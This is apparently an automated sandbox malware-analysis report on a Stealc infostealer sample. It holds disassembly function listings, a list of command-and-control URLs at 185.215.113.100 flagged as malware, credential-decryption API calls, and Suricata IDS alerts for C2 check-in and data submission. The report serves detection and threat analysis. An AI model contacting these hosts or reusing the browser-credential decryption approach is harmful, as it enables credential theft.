Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
Instruction ID: 7528e6f9b4f2574fd68515787ea5382a2c886459b1ffc55e2dc9249309892321
Opcode Fuzzy Hash: 52a4e0c71e5ae920ff2dc2899b62758622e1cb61baea992e056c2df19afbddfb
Instruction Fuzzy Hash: C73170B5A043059FD704CF14D884A9FBBE4FF89314F00442EE85A97741DB30E919CB96

Function 6C68B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C68B4F5
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B502
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C68B542
free.MOZGLUE(?), ref: 6C68B578

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
Instruction ID: d55229c5b2bbc01055727b3fa1eb0a56c1de7e1df98d6b283b10ed2c20b5d493
Opcode Fuzzy Hash: 6e0f6bef24dc2f61200e8a3930d0bf8d745664f2b2fab1b4d47885a7b685e6e3
Instruction Fuzzy Hash: 5A11D231A04B41C7D3118F2AD8407A5B3B2FFDB319F10570AD89953A02EBB1A5C5C7AE

Function 6C6B3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C67F20E,?), ref: 6C6B3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C67F20E,00000000,?), ref: 6C6B3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6B3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C6B3E0E

Part of subcall function 6C6ACC00: GetCurrentProcess.KERNEL32(?,?,6C6731A7), ref: 6C6ACC0D
Part of subcall function 6C6ACC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6731A7), ref: 6C6ACC16

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
Instruction ID: 75a290f735dadd7c9327a839e024858a507899518fc83a019e54c306ad85e626
Opcode Fuzzy Hash: 094cc1598978bde7a2655d0ef85eb07bc4313b2b4bd87792bbbbbee648dce3d3
Instruction Fuzzy Hash: 59F012B16402087FD700AB55EC81DAB376DDB47624F050021FE1957741D636BE2686FF

Function 6C6C85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C6C85D3

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C6C8725

Strings

map/set<T> too long, xrefs: 6C6C8720

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 78ca2737089b1f0c8de571542c6782c8538f1c2f1c10f91cdd2925b6d89b48c6
Instruction ID: 1a4dd4076c8efc404ca7f6ec33b6c74de1960c94a614a98001f6a4499d83f91b
Opcode Fuzzy Hash: 78ca2737089b1f0c8de571542c6782c8538f1c2f1c10f91cdd2925b6d89b48c6
Instruction Fuzzy Hash: DF516474A006418FD711CF29C184A9ABBF1FF4A318F19C28AD8595BB62C335EC85CF96

Function 6C67BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C67BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67BE8F

Strings

0, xrefs: 6C67BE5B

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
Instruction ID: 5405e39e928d43517768fb48cea97d215a68dec3859e8a366a425583ca1b4252
Opcode Fuzzy Hash: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
Instruction Fuzzy Hash: 8241AF71909745CFC321CF28C481A9BB7E4AFCA388F104E1DF98597711E73099498BAA

Function 6C6B3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3D19
mozalloc_abort.MOZGLUE(?), ref: 6C6B3D6C

Strings

d, xrefs: 6C6B3D58

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
Instruction ID: 2ac950583305eebf2d7cfddfd5d919bbc4549abf67941512d37082b37cdca2c9
Opcode Fuzzy Hash: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
Instruction Fuzzy Hash: C211E635F08648DBDB008F69CC544EDB7B5EF8A318F448229D9556B602EF30A594C358

Function 6C6D6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6D6E22
__Init_thread_footer.LIBCMT ref: 6C6D6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6D6E1D

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
Instruction ID: 42f6c6c444465a5fcbb1850d3696925d13f3e2c668186a882d7c248f208fc7ea
Opcode Fuzzy Hash: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
Instruction Fuzzy Hash: 79F024712082428BDB008B6AE8D2A8977B35313318F050565C42186B61CF21F907CE9F

Function 6C689E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C689EEF

Strings

NaN, xrefs: 6C689EC1
Infinity, xrefs: 6C689EB7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: e5c3316537fbf2d888f06707aa2f7dc6a451198185d0db9c1c79c1f688c74fac
Instruction ID: 9d8ddcf7918f4f678e48282bfac184ac08915f023b86686841926794054c7c71
Opcode Fuzzy Hash: e5c3316537fbf2d888f06707aa2f7dc6a451198185d0db9c1c79c1f688c74fac
Instruction Fuzzy Hash: 59F037B1601645CBEB008F5AF8CAB9037F3BB47319F200A1AC5654AB41D7766547CABF

Function 6C686C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C42

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C58

Strings

0Kkl, xrefs: 6C686C33, 6C686C41, 6C686C57

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kkl
API String ID: 1967447596-1873664643
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 2e4e7c6975ee3e1990aad6bf5d593c523e8b20b9b682b7a7945fd5eea9956236
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: B0E086F1A265055A9B08997CAC4956A71C89B153A87044A3AE823C6BC8FA98E590817D

Function 6C68BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C68BEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C68BEF5

Strings

cryptbase.dll, xrefs: 6C68BEF0

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 9b816308c08e3f2e4ab821813cb51b549d4ffbce4688bd73f07e38c40506fe4a
Instruction ID: 2f872fec6e9d082b5635337eed9808935ef26492d2db5114891a31b455d2391a
Opcode Fuzzy Hash: 9b816308c08e3f2e4ab821813cb51b549d4ffbce4688bd73f07e38c40506fe4a
Instruction Fuzzy Hash: C2D0A731185208EACB006A519D09B2937759781395F10C020F32544951C7B09413CF6C

Function 6C6CB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB628

Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6CB127,?,?,?,?,?,?,?,?), ref: 6C6CB74D

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
Instruction ID: c70f350c5f6f31d5a44318969ca7ac2b46316eb4bdaefc345ef2fcb3e766e7d6
Opcode Fuzzy Hash: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
Instruction Fuzzy Hash: 2F51DCB1B052168FDB14CF19C9847AEB7B5FF85309F05852DCC5AAB700DB31A814CBAA

Function 6C6C6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C6C6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C6C6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6C6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6C6F5C

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: d0814038235ed9738cfcf51e93152e05a74038c141d06f40d40354070867d411
Instruction ID: 25b1a5f685a58d3709499c2ad17cb88344ec3f9b768d5999314bf229459cd111
Opcode Fuzzy Hash: d0814038235ed9738cfcf51e93152e05a74038c141d06f40d40354070867d411
Instruction Fuzzy Hash: 07310571B1460A8FDB14CF2CD9806BA73FAEB84304F50813AD42AC7651EF31E659C7A9

Function 6C6DB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C680A4D), ref: 6C6DB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C680A4D), ref: 6C6DB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C680A4D), ref: 6C6DB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C680A4D), ref: 6C6DB67F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 3ba582ec928519048cecad407e6e6b8ed865c651fe00909e3b7fffd39b69df2d
Instruction ID: c2aaf90835dd36950f0a3a8501955c74a6cbc5ead294c482cb78a8638f0125a0
Opcode Fuzzy Hash: 3ba582ec928519048cecad407e6e6b8ed865c651fe00909e3b7fffd39b69df2d
Instruction Fuzzy Hash: D231E371A002168FDB10CF59C88465ABBB6EFC0304F178569E8169B209DB31F915CBA4

Function 6C6AF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6AF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C6AF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C6AF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C6AF668

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: db5f44be5a19a9a435210b4402dc08b9140cbfeb418ddbd56de70bdf78b924af
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: EF316171A00214AFC714CF5DCCC0A9B7BB6FB98354B148539FA4A8BB05D632FD468B99

Function 6C6C26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6C26C1
free.MOZGLUE(?), ref: 6C6C26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6C26FF
free.MOZGLUE ref: 6C6C270D

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 0a215f777b7e114b8d6052c3dbf76310dcca4bfc6d7c462fa33566c4723aa4c5
Instruction ID: cbaf50ddfafae0548418de37d1bce1f85d760daf7740d304bd7c6bc9e6a5eece
Opcode Fuzzy Hash: 0a215f777b7e114b8d6052c3dbf76310dcca4bfc6d7c462fa33566c4723aa4c5
Instruction Fuzzy Hash: 8DF0F9B27012016BE7109A19E8C4E47B3A9EF4135CB100035EE1AC3B01E732F919C6BF

Source: http://185.215.113.100/	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dllh	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpS_	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpn	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpBrowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpGO4	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php3P	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpe	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phppl	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllP	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll4	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpive	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpP	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php8	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllz	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllj	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php33	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php=I	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php1	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php$	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll~	Avira URL Cloud: Label: malware
Source: 185.215.113.100/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php=C	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00959BB0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00959BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00968940 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00968940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00957280 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00957280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00959B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00959B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095C660 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0095C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C686C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80

